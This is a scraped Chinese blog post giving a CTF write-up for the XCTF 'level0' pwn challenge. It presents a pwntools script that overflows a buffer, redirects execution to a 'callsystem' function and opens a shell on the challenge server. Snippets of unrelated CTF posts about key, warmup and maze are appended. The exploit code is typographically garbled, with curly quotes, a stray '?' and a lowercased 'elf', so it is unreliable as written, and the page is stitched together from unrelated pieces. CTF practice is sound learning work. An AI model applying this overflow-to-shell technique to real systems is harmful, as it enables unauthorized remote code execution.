xctf攻防世界pwn level0

2021-09-25 13:03:47 字數 473 閱讀 5237

答主也是個小白,學長告訴我要用指令碼,我也不會寫,用的別人寫好的指令碼

from pwn import *

p= remote(『111.198.29.45』,33907)

elf=elf(』./level0』)

sysaddr=elf.symbols[『callsystem』]

payload=『a』*(0x80+8)?+p64(sysaddr)

p.recv()

p.send(payload)

p.interactive()

注意指令碼檔案為python檔案(csdn不能上傳python檔案),且連線的埠(我的是33907)需要去題目所在的場景獲取,這個埠需要更改

開啟ubuntu,將level0,和指令碼檔案拖進來

開啟終端

xctf 攻防世界 key

好久沒有去攻防世界玩了 主要是這段時間太忙了 有很多 雜事 纏身吧 然後沒事看看堆 就。看自閉了 然後這道題其實還是很簡單的 有很多函式 還有指令其實感覺 用od 或者ida 直接靜態 就能查出來什麼意思 就沒有必要 去深究 裡面的演算法 點進去 主要的函式 發現了這個東西 注意這個 memory ...

XCTF攻防世界warmup

擷取字串從0到?重新賦值給 page page,0 mb strpos page 尋找第乙個?的座標 if in array page,whitelist page urldecode page url解碼 page mb substr page,0,mb strpos page if in arr...

xctf攻防世界maze writeup

ida64開啟,f5分析 輸入乙個24位字串,儲存到s1裡,經過一系列判斷處理,才能到達congratulations!int64 fastcall main int64 a1,char a2,char a3 要求輸入的s1長度為24,開頭和結束應該是nctf v3 5ll if strlen s1...